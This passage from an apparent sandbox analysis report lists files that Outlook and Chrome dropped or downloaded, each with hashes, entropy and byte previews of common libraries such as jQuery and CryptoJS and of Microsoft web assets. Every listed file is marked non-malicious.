                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:Microsoft Outlook email folder (>=2003)
                                                                Category:dropped
                                                                Size (bytes):2302976
                                                                Entropy (8bit):1.0729738155596658
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B80FEC0DB2B04BDEA60E6BD9E03510FB
                                                                SHA1:1E7CF8F81EE81AF325640E875161B6508C3A08C4
                                                                SHA-256:975C55B5441A0AAB03A3A08D274E420E08C7AE28CF89CE0567AFF74BB116AA10
                                                                SHA-512:9A1AF0BA4BB0EF3B7AADDF3CD96C8477F754455C426E218EC7D4F09A3F99DD3C8D54B9A54A4FB970765DA5C3F24726FD6C8DD4AFE28DAFDF175245DFF4E65657
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!BDNe..SM......\.......P..............u................@...........@...@...................................@...........................................................................$#......D...........................................................................................................................................................................................................................................................................................................................................r.c[.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):262144
                                                                Entropy (8bit):4.1915180536204675
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F54C2346612BC6ECE1958A2485CBD6CD
                                                                SHA1:7346670FAE51D2B9E062F4947DD296016FB8FA78
                                                                SHA-256:E7A770EC1F4932677425329736CBB1C5FF8D1432481522C06D5D74A1215C9CB8
                                                                SHA-512:034B19411C1F7AF5DD379B860A896345491EA062999521B0807478A0C80CB8A0C26800AE575E04CC4C32244E1EF53778F4C7ECCBF97134D1DD968DC291114937
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.#n.0...........H......].........D............#......................x......................................................................................................................................................................................................................................................................................................................................?.......................................................................................................................................................W....D......>.X.0...........H......].........$............#.........................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):48316
                                                                Entropy (8bit):5.6346993394709
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):4054
                                                                Entropy (8bit):7.797012573497454
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9F14C20150A003D7CE4DE57C298F0FBA
                                                                SHA1:DAA53CF17CC45878A1B153F3C3BF47DC9669D78F
                                                                SHA-256:112FEC798B78AA02E102A724B5CB1990C0F909BC1D8B7B1FA256EAB41BBC0960
                                                                SHA-512:D4F6E49C854E15FE48D6A1F1A03FDA93218AB8FCDB2C443668E7DF478830831ACC2B41DAEFC25ED38FCC8D96C4401377374FED35C36A5017A11E63C8DAE5C487
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR.............J.......tEXtSoftware.Adobe ImageReadyq.e<...(iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c132 79.159284, 2016/04/19-13:13:40 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:A00BC639840A11E68CBEB97C2156C7FD" xmpMM:InstanceID="xmp.iid:A00BC638840A11E68CBEB97C2156C7FD" xmp:CreatorTool="Adobe Photoshop CC 2015.5 (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A2C931A470A111E6AEDFA14578553B7B" stRef:documentID="xmp.did:A2C931A570A111E6AEDFA14578553B7B"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.......DIDATx..\..UU.>.7..3....h.L..& j2...h.@..".........`U.......R"..Dq.&.BJR 1.4`$.200...l........wg.y.[k/
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (32681), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):216898
                                                                Entropy (8bit):3.860005144176851
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7A0B259E7CCAC96EE9457E93E2802DED
                                                                SHA1:4D348A5473FD2DACBC5B38F9C1D9624CBEF12493
                                                                SHA-256:EEDA15E4239C204FE8E6B38281806FFA3BE7BDA1EAA14D82A4788A1EE160E222
                                                                SHA-512:1C92223A0C130E2395AA46784DEB01AA2C28FF6D69ADB1910F0497A0660CAAA93B7E54D9A6A0209324AB2AFD8F1FA609F7B6F8CF1F269CD35CF73C81A95BF893
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/onerfstatics/onerfjquery-3.5.1.js
                                                                Preview:../.*.!. .j.Q.u.e.r.y. .v.3...5...1. .|. .(.c.). .J.S. .F.o.u.n.d.a.t.i.o.n. .a.n.d. .o.t.h.e.r. .c.o.n.t.r.i.b.u.t.o.r.s. .|. .j.q.u.e.r.y...o.r.g./.l.i.c.e.n.s.e. .*./.....!.f.u.n.c.t.i.o.n.(.e.,.t.).{.".u.s.e. .s.t.r.i.c.t.".;.".o.b.j.e.c.t.".=.=.t.y.p.e.o.f. .m.o.d.u.l.e.&.&.".o.b.j.e.c.t.".=.=.t.y.p.e.o.f. .m.o.d.u.l.e...e.x.p.o.r.t.s.?.m.o.d.u.l.e...e.x.p.o.r.t.s.=.e...d.o.c.u.m.e.n.t.?.t.(.e.,.!.0.).:.f.u.n.c.t.i.o.n.(.e.).{.i.f.(.!.e...d.o.c.u.m.e.n.t.).t.h.r.o.w. .n.e.w. .E.r.r.o.r.(.".j.Q.u.e.r.y. .r.e.q.u.i.r.e.s. .a. .w.i.n.d.o.w. .w.i.t.h. .a. .d.o.c.u.m.e.n.t.".).;.r.e.t.u.r.n. .t.(.e.).}.:.t.(.e.).}.(.".u.n.d.e.f.i.n.e.d.".!.=.t.y.p.e.o.f. .w.i.n.d.o.w.?.w.i.n.d.o.w.:.t.h.i.s.,.f.u.n.c.t.i.o.n.(.C.,.e.).{.".u.s.e. .s.t.r.i.c.t.".;.v.a.r. .t.=.[.].,.r.=.O.b.j.e.c.t...g.e.t.P.r.o.t.o.t.y.p.e.O.f.,.s.=.t...s.l.i.c.e.,.g.=.t...f.l.a.t.?.f.u.n.c.t.i.o.n.(.e.).{.r.e.t.u.r.n. .t...f.l.a.t...c.a.l.l.(.e.).}.:.f.u.n.c.t.i.o.n.(.e.).{.r.e.t.u.r.n. .t...c.o.n.c.a.t...a.p.p.l.y.(.[.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 141866
                                                                Category:dropped
                                                                Size (bytes):49804
                                                                Entropy (8bit):7.994672288751266
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:6DE768A4DF1E0D0061CDB52EF06346C4
                                                                SHA1:3829A667B97668008023DDA98F4C0772174C8EF6
                                                                SHA-256:58732EEE2ED9091F4F5776DC8A8A14116CBE5A2BA1CCDA0256896BAB08A52128
                                                                SHA-512:CC6966D2C2B43E762750102E734DA6B88D7BFB92DDB5D482EE25029337D95E997466E83001586F2B63DAEE890B5F3188E8EC0F1B084D5EB67CFEA55EDDFAD47D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:...........m[.8.0........OL....;w..nf.0.ff.X.'V......4.r~........=........,..JU.......T~.l..?..E.....X..|t~P9...TN..G..?^.~.............Xx.0..Q..Fa4.#7.q...F.;......4...Q.W&~.@....O.*T.y.37J.+Ggf...P....Pz.N...>..a.D..<.m./A,*...Q.....WN.Q...8.Db$.G.H<...'....J,..8..{nG.2@HYkL../......=.pL....A?.&Ng.i,......2lo...$.<.3...?~pW..=...L..&x.QR.u3..#6q2....U.Y1..".M. .<W."7@......w..."H,@......0..P....p:...[...E].A..%..V.K\.......F.ir.}.Lc{s..O.g..(|.........9o..A.t.K....Wv.l6..T.......t.........+..........-w {l..g...V..\=W.j.oaT}t.J`E..$W......;.k.\.t.w~}".....jf..W..."..a..0y........@.T.1.G0.......*.Y_....../..........@.....*]+.*..*.q\.cR.....t.3S-5g....'U.j.d......y.n,:).|.?.FW...d...|.......*.`.3....kMKf...#..,DM.TY+..g.........e+.>...{y..N/..g-#FV.V.p.......Xs.(..{..}..-.O..H=."...........8M.g..!H..0.~.Tdf.;...$D%N .)..!..V...'r\.... ...&....J|."Nd%D:uw:.<W.+...H&.Z...L=..U.v....J.t.0%+...U..3M....y...L..G...p='.....pB"-..|.....j .a".i=O.R Q2..."...
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):631
                                                                Entropy (8bit):6.391875872958697
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FB2ED9313C602F40B7A2762ACC15FF89
                                                                SHA1:8A390D07A8401D40CBC1A16D873911FA4CB463F5
                                                                SHA-256:B241D02FAB4B17291AF37993EB249F9303EB5897610ABAFAC4C9F6AA6A878369
                                                                SHA-512:9CBCF5C7B8409494F6D543434ECAFF42DE8A2D0632A17931062D7D1CC130D43E61162EEDB0965B545E65E0687DED4D4B51E29631568AF34B157A7D02A3852508
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR... ... .....D.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...{PLTE.P".J$x......P".P".J$x.........K..K..K..D.o..w..w..w.........................................................P"...................$tRNS.DD...CC..DEC..CEDDEC..CED...CC...DD.c,8....bKGD(........pHYs...........~.....tIME....."4...4...QIDAT8...G.. ...Q..s....?......s.f..a`.A... .bA!..,/dYQ.....a.((j^.m?4..Q.?.....2>.........%tEXtdate:create.2020-05-28T22:34:52+02:00.t.....%tEXtdate:modify.2020-05-28T22:34:52+02:00.)<'...WzTXtRaw profile type iptc..x.....qV((.O..I.R..#..c..#.K.... D.4.d.#.T ...........H.J.....t.B5.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):111613
                                                                Entropy (8bit):4.898945395781278
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:31700A24F91B427D34E24A5929CC093C
                                                                SHA1:C6AA8CE3508BCE4829C9330C46A30BFF22A8469D
                                                                SHA-256:E55BC23064F6B4961CAC926CF3AEF846B64FFD2656F924F8F144E0AB97E35EBA
                                                                SHA-512:69300960B73A105616C0815478CBEFC782CFBF83E5E8B6E18527EEC4B447FAACC3845B2AA62DFD7DF690E391D52CF797DD8DFCE1EE5FE3CF446D649587673A9E
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/mwf/slider.js
                                                                Preview:// vid team slider.js..define("observableComponent", ["require", "exports", "htmlExtensions"], function(n, t, i) {.. "use strict";.. Object.defineProperty(t, "__esModule", {.. value: !0.. });.. var r = function() {.. function n(t, i) {.. i === void 0 && (i = null);.. this.element = t;.. this.ignoreNextDOMChange = !1;.. this.observing = !1;.. n.shouldInitializeAsClass(t, i) && this.setObserver().. }.. return n.prototype.detach = function() {.. this.unObserve();.. this.teardown().. }.. ,.. n.prototype.isObserving = function() {.. return this.observing.. }.. ,.. n.prototype.unObserve = function() {.. this.observing = !1;.. this.modernObserver && this.modernObserver.disconnect();.. i.removeEvent(this.element, i.eventTypes.DOMNodeInserted, this.obsoleteNodeInsertedEventHander);..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (3450), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):3452
                                                                Entropy (8bit):5.117912766689607
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CB06E9A552B197D5C0EA600B431A3407
                                                                SHA1:04E167433F2F1038C78F387F8A166BB6542C2008
                                                                SHA-256:1F4EDBD2416E15BD82E61BA1A8E5558D44C4E914536B1B07712181BF57934021
                                                                SHA-512:1B4A3919E442EE4D2F30AE29B1C70DF7274E5428BCB6B3EDD84DCB92D60A0D6BDD9FA6D9DDE8EAB341FF4C12DE00A50858BF1FC5B6135B71E9E177F5A9ED34B9
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://login.live.com/Me.htm?v=3
                                                                Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (31781)
                                                                Category:downloaded
                                                                Size (bytes):353056
                                                                Entropy (8bit):3.54628063061396
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B3798F354AF881F8C1E8B35A709AF24A
                                                                SHA1:5F5FD96E90037BF99BB06172FDFEFDC4B9CB7601
                                                                SHA-256:A3834415AF119205CA2080700B3F05C2F648D81CF47F6CB6AA9ABDBC3499B00B
                                                                SHA-512:9CE111C3F4CB4D80B9AC60474C396B1A2CB0008974CCBCF1F3976DDD9EE2D3DB8F896A905B31BC06E418A041EB1C024988D003983BB7381378E947701E351643
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/mwf/slider.css
                                                                Preview:..@.c.h.a.r.s.e.t. .".U.T.F.-.8.".;.../.*.!. .1...5.8...6.-.b.e.t.a. .|. .C.o.p.y.r.i.g.h.t. .2.0.1.7. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n. .|. .T.h.i.s. .s.o.f.t.w.a.r.e. .i.s. .b.a.s.e.d. .o.n. .o.r. .i.n.c.o.r.p.o.r.a.t.e.s. .m.a.t.e.r.i.a.l. .f.r.o.m. .t.h.e. .f.i.l.e.s. .l.i.s.t.e.d. .b.e.l.o.w. .(.c.o.l.l.e.c.t.i.v.e.l.y.,. .".T.h.i.r.d. .P.a.r.t.y. .C.o.d.e.".)... .M.i.c.r.o.s.o.f.t. .i.s. .n.o.t. .t.h.e. .o.r.i.g.i.n.a.l. .a.u.t.h.o.r. .o.f. .t.h.e. .T.h.i.r.d. .P.a.r.t.y. .C.o.d.e... .T.h.e. .o.r.i.g.i.n.a.l. .c.o.p.y.r.i.g.h.t. .n.o.t.i.c.e. .a.n.d. .t.h.e. .l.i.c.e.n.s.e. .u.n.d.e.r. .w.h.i.c.h. .M.i.c.r.o.s.o.f.t. .r.e.c.e.i.v.e.d. .T.h.i.r.d. .P.a.r.t.y. .C.o.d.e. .a.r.e. .s.e.t. .f.o.r.t.h. .b.e.l.o.w. .t.o.g.e.t.h.e.r. .w.i.t.h. .t.h.e. .f.u.l.l. .t.e.x.t. .o.f. .s.u.c.h. .l.i.c.e.n.s.e... .S.u.c.h. .n.o.t.i.c.e.s. .a.n.d. .l.i.c.e.n.s.e. .a.r.e. .p.r.o.v.i.d.e.d. .s.o.l.e.l.y. .f.o.r. .y.o.u.r. .i.n.f.o.r.m.a.t.i.o.n... .M.i.c.r.o.s.o.f.t.,. .n.o.t. .t.h.e. .t.h.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:GIF image data, version 89a, 960 x 540
                                                                Category:dropped
                                                                Size (bytes):89401
                                                                Entropy (8bit):7.983830870854764
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B1F5B34FD4653ECC55A495B7A6A59B51
                                                                SHA1:A3E0E79E99FE0614A67143206A4B91E6811AE61C
                                                                SHA-256:2A38C4E7692EFECBF4B5F6EFD20DDBD3D77D2EDC91F8A76132431C6A068A6E41
                                                                SHA-512:C67F0806499612281C4D03362CC459ACCC5254709FA351B8AFAA5F2C1509F723E465DEEE675ADF154B95A12F66A26C9B7B2D63C86BEF7B321D2C7E9CF41BE5C8
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:GIF89a............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.....................!.......,............c..Hp.....*L.p....J.Hq.../j..q.. ?..Ir..(O.L.r..0_.Is..8o...S.@.1...Jt..H.*M.t..P.J.Ju..X.j..u..`...Kv..h.M.v..p..Kw..x....(......<Xp...#^..q..!3..8...+c..3..As..9...K.^..5..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 80 x 7, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):4.035372245524405
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:44C5799340116FA8DBBED149CB0523B3
                                                                SHA1:8E41D584A29D415F97E2FD705BF78B3A8A0916A5
                                                                SHA-256:3109AE4BEEC2464425EF08C4EEDB0F3D9CF5698EC10FF7A376DB1868657761F5
                                                                SHA-512:79AFE6AC217BCD6B3526224139F9B1E76C359C20DA6CE49DBD3A746F058792FB3A9434AFEDC074199371DB2A6E3B80B8C57C32AB151D96A5619E0BBC8DF16CD5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:.PNG........IHDR...P...........].....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:Web Open Font Format (Version 2), TrueType, length 22904, version 0.0
                                                                Category:downloaded
                                                                Size (bytes):22904
                                                                Entropy (8bit):7.9904849358693575
                                                                Encrypted:true
                                                                SSDEEP:
                                                                MD5:C654A623AD90BB3DCD769DBBAC34D863
                                                                SHA1:8719DE38F17D8E4D73E2A5E4E867D63DD3965BAA
                                                                SHA-256:DEEC787CCA1B9436E080478742A0299E0DB1A9712543A72D2CDC8373FC45A432
                                                                SHA-512:B7440CEC44B71BCDBEFCD878A860EE3CC0163DC0905DC688EBCBCD7C6F5CFDFC187EA0C2B6247A362AD462450C34020933DF7825CF6CEAEB3138D65EB944ABAD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/mwf/_h/v3.54/mwf.app/fonts/mwfmdl2-v3.54.woff2
                                                                Preview:wOF2......Yx.......8..Y..........................`..`..8.*..Y........a.6.$..X..n.. ..[. ..S...u..l.....!......I=...ubpS5 ...o.........c.7<.y...Q..i.n..T`R.......|h'..f.=4..G..xI&.V1...6...jf....%.y.!*.).../Cj....].W%5VIj...(.........'Q.}.+.Jg.L0..$q.......#..d&...tV.".d..,.(!...p.).. ..d[........hdg.....!=..H..y.\..p.Q.O.........`e#.X..`#F..T....p.@.)UO.;85..y..@..)...!..........GNT.W...VV..j...-=+G%.yuK...u.........%c.Z......8%. ...V..P.^t....g.x.Tkw.g.....H..._R._{...u.....\%.L+...S...+).......Y&,......3......... c...v.S.LI6...X..A.....S...f-.f....X.....F.Zfwe<#c#...S......bk.HA...K.{.YG...9..24;._+ad.md..c..%..uo...6.5....../..tv.(.l.6.>.V..Q.[..Mr.O...,.......B.......TI.7..X.V...O_._3~.5..0..".$.(.j.....b.....W.O.F....$.H.I$.L.)..J.i....N..d..c.......".l..!.\r.#.|.)..B.)..b...$D..J(..2.(...*...*.....j...:....h..&.h...Zh..l....i...:.....z.>.....d.!..f..F.e.1..g..&.d.)..f..f.e.....9.g...Xd.%.Xf..VXe.5.X.z6...ld....f....le....vv....d..
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:dropped
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):19428
                                                                Entropy (8bit):5.791185899562432
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F120D020745AB1BF189AB90B7B739423
                                                                SHA1:8BA59A388BF1EF9E55448436E6396AA5708EFAD8
                                                                SHA-256:84867195CF813728A88A3C3B7B6F79720722121C9894D056274B3996DC2A7492
                                                                SHA-512:A0651D1B881EC443E9351840D00F5C9BF7B05AAF01BE94445F0F2A5558327F3D0147EAE16C51FCAEEE82A2FC33BDEEB3CE5A0B5A6B06F20948458346281A8CC5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.microsoft.com/videoplayer/lib/js/load-script.js
                                                                Preview:function loadScript(url, async, defer, crossorigin, type) {.. var script = document.createElement('script');.. script.src = url;.. if (async) {.. script.async = true;.. }.. if (defer) {.. script.defer = true;.. }.. if (crossorigin) {.. script.crossOrigin = 'anonymous';.. }.. if (type === 'head') {.. document.head.appendChild(script);.. } else {.. document.body.appendChild(script);.. }..}..// SIG // Begin signature block..// SIG // MIIregYJKoZIhvcNAQcCoIIrazCCK2cCAQExDzANBglg..// SIG // hkgBZQMEAgEFADB3BgorBgEEAYI3AgEEoGkwZzAyBgor..// SIG // BgEEAYI3AgEeMCQCAQEEEBDgyQbOONQRoqMAEEvTUJAC..// SIG // AQACAQACAQACAQACAQAwMTANBglghkgBZQMEAgEFAAQg..// SIG // wICQeL6lBTAvIyDbUlJWb/8FTBOcmun3GMJyJMBUXT6g..// SIG // ghFuMIIIfjCCB2agAwIBAgITNgAAAd9zgZcWvjL9DQAC..// SIG // AAAB3zANBgkqhkiG9w0BAQsFADBBMRMwEQYKCZImiZPy..// SIG // LGQBGRYDR0JMMRMwEQYKCZImiZPyLGQBGRYDQU1FMRUw..// SIG // EwYDVQQDEwxBTUUgQ1MgQ0EgMDEwHhcNMjQwMTIwMDEz..//
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (2674)
                                                                Category:downloaded
                                                                Size (bytes):2728
                                                                Entropy (8bit):5.253272384445131
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:468D4ACC570CFFC7101AC8A63514AD31
                                                                SHA1:6983E89B6EC798B5B8C2B3B76D9311808437B572
                                                                SHA-256:B4B342F2025799CA602A75590B324E7493B0903726720BCE4CA793207C83255C
                                                                SHA-512:9042A219E8511FF281B9F680B3577CE3EAE29E881F24BE1D2B46C89D1F0013E30AA890C1A0181FF83975E125F62C0C6E896D3B8515067221143D9A3290B42865
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/js/MeControlCallout.Main.min.js?v=tLNC8gJXmcpgKnVZCzJOdJOwkDcmcgvOTKeTIHyDJVw
                                                                Preview:!function(){"use strict";var t,e,n=function(t){try{return sessionStorage.getItem(t)}catch(t){}return null};!function(t){t.EXPANDED="meControlAccountSelectorExpanded",t.COLLAPSED="meControlAccountSelectorCollapsed",t.SWITCHTYPE="meControlSwitchAccountType",t.SWITCHMSA="meControlSwitchMSAAccount",t.SWITCHAAD="meControlSwitchAADAccount"}(t||(t={})),function(t){t.REMOVE="teachingCalloutRemove",t.SHOWN="teachingCalloutShown",t.TIMEOUT="teachingCalloutTimeout"}(e||(e={}));var o,i,a=$("#meControl"),l=$("#smcTeachingCalloutPopover"),c=$("#teachingCalloutDismiss"),r="teachingCalloutShown";function d(t,e){var n,o={isAuto:!1,content:{contentId:e},behavior:t};null===(n=window.analytics)||void 0===n||n.captureContentUpdate(o)}$((function(){l&&l.length>0&&(function(t,e){if(t.length&&e.length){var n=t.offset().top;i=window.setInterval((function(){var o=e.offset().top;t.offset({top:n+o})}),15)}}(l,a),window.document.addEventListener("displayTeachingCallout",(function(t){try{if(null===n(r)&&null!=t.det
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65451)
                                                                Category:downloaded
                                                                Size (bytes):89476
                                                                Entropy (8bit):5.2896589255084425
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://support.microsoft.com/lib/jquery/dist/jquery.min.js?v=9_aliU8dGd2tb6OSsuzixeV4y_faTqgFtohetphbbj0
